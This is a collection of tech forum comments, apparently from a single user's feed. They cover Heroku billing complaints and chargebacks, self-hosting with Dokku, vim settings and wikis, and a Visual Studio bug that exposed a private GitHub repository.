Wow, it’s pretty slow, but there’s still some activity in the HD2 forums on XDA. ? I’d also be surprised if Lobsters has no one around who still supports a WinMo 6.5 device in the form of handheld inventory scanners, as plenty are still out there.
-
I got burned by this on my hobby project. The self-updating command line tools started warning me that my database was wrong for technical reasons and needed to be updated (I wish I’d taken screenshots - if you see this, please do). It walked me through steps of updating to a new db with no mention of fees - I was thinking this was like the infrequent updates from deprecated app stacks. A few weeks after I did the update, they started charging me for both the $9/mo db I had and a new $50/mo db, backups stopped working, it’s not clear which db is even in use, support was shocked, shocked that their tool had told me to update to a more expensive thing, and rather than resolving the issue they closed my ticket.
I’m looking into the various “heroku in a box” tools and will migrate my hobby project to a $5/mo VPS with SSL this weekend, contest the charges with my payment card, and start moving my employer’s consulting clients over to whatever that tool is. Even if the card doesn’t chargeback my lost $100 Heroku’s will lose that in… uh, about an hour given the size and number of clients we have.
-
I didn’t keep it running much longer than it took to push an app and see how it works, but DigitalOcean’s Dokku prebuilt image was pretty easy to get going. IIRC I just needed to add a plugin for PostgreSQL support if I wanted to manage that through Dokku’s interface, but there were more than one to check out with different features in terms of how they separate accounts/dbs/instances, or had backup/restore helpers.
(I don’t think Dokku is hard to set up, I’ve also toyed with it on local vms, but the one-click app image on DO is how I learned of the project at all, so here’s my plug for DO. ?)
-
-
I’ve had reasonable success with using Dokku on a $5/MO DO Droplet. I’ve considered looking at things like Deis or self-hosted OpenShift, but Dokku is really the simplest / lightest one that fits my needs (it also helps that there’s even a Dokku app stack on DO).
While I haven’t experienced that level of WTFery with Heroku as you’ve mentioned, I have definitely been hit with a bill I wasn’t expecting (same for AWS..).
-
I got burned in a similar way where I logged in and it told me to fix my db, but it only gave me options for the more expensive databases, so I clicked cancel. Next month, behold, I was now the proud owner of a $50/mo db on a free grandfathered heroku stack. I contacted support and they were adamant about how ‘you can’t sign up for a new service without going through the process’ and told me it was my fault. Their story was that because I initiated the upgrade I was no longer eligible for the grandfathered db and therefore signed up for the paid db which I agreed to by clicking a button like “Resolve Issue” or something. I backed up my hobby projects, cancelled the service (though they still charged me). I then contacted heroku (again) and told them I would be filing a chargeback on the charge if they didn’t refund it. When they didn’t, I provided Citi with the email chain, the original support ticket chain, and the charge. Because the support was started so soon after the charge was made and the support was ended so abruptly, they decided in my favor. Used to like Heroku, but they literally destroyed their reputation with one interaction. I don’t have clients, but the company I used to work at was looking at GCloud vs AWS vs Heroku and I made sure none of that very large amount of servers went to heroku.
-
-
Very cool, and I didn’t even know :TOhtml was a thing, and syntax-styled too!
I shied away from
set exrc/set secure, because I clone a lot of stuff from github and don’t check for dot-files before I go poking around with vim/view, and at a glance it seemed like it can’t do much for bad stuff that git creates in workdirs, owned by me. I’m iffy about all that kinda “behave differently from files in each directory” stuff.
-
flyingfisch
2 years ago
|
link
| on:
How a bug in Visual Studio 2015 exposed my source code on GitHub and cost me $6,500 in a few hours
As much as I hate to admit this, neither Microsoft nor GitHub are directly responsible for the data breach. The fact that the key was in the repo was the developer’s fault and no one else’s, it looks like he is just looking for a target to lash out at.
-
As @craigstuntz linked, Microsoft tracked and fixed it as a VisualStudio bug. It is not user error. I agree with you that putting keys in source control is a bad pratice, but “developer’s fault and no one else’s” is simply incorrect.
-
The key disclosure isn’t even the only disclosure here, like yes secrets in git is a terrible practice and it’s reasonable for like one person to show up in the thread saying so, and not like a jerk, but c'mon have some chill, people. This dude was also worried about his source and he may be out 6.5 grand. That sucks and he might just be writing the blog post to sway some Amazon robots into doing something about the bill, too.
-
OK, understood. Sorry for the flippant remark, didn’t mean to be incendiary.
@meridith Thanks for reminding me of the other factors he has to deal with, for some reason they hadn’t completely sunk in when I wrote that. ;-)
-
-
-
To the people who dv-ed as incorrect: My point is not that MS and GitHub are entirely free from blame, but that they are not directly responsible. You shouldn’t even be putting keys in private repos.
-
I disagree. The guy wanted to put private data in a private repo. He clicked the “private repository” checkbox, and the plugin made the repo public. Clearly a software bug.
I agree private keys in a repo might not be a good idea, but it’s irrelevant here. People put a lot of valuable private data in source control (like proprietary source code).
I’m almost surprised GitHub didn’t pick up the bill just to avoid the embarrassment of having this all over tech news sites. Clearly they didn’t test it very well…
-
I use vim plus SyncThing. My wiki (and journal) contains sensitive stuff, so I avoid storing the data on publicly accessible servers. Also, no maintenance of some database.
The obvious downside of vim is the lack of rich text, especially I cannot insert graphics or other files.
I am a vim aficionado myself, but for this usecase I bit the bullet and use Emacs (+evil) with org-mode, it supports links, tables and graphics.
I do similar, but with SpiderOak for sync. I’m using vimwiki set up so wiki 1 is always machine-local and wiki 2 is global. I also have a variant of this config to let me open/edit
.gpg.wikifiles, for content I’d like that extra layer on. I just include the.gpgin the page path and vimwiki happily plays along. Vimwiki is a little more close at hand than web-based wikis for me – I especially love the quick diary shortcut.Buuuut it sounds like the OP is looking for something prettier and with seamless image inclusion. With vimwiki, file attachments are just relative links to stuff I’ve dropped in the sync dir, and you can include images in the markup, then have vimwiki set to regenerate HTML copies of your pages on write, and view the pretty version through those. I haven’t even touched the HTML features, personally, just mentioning that’s about the best it can do in this area.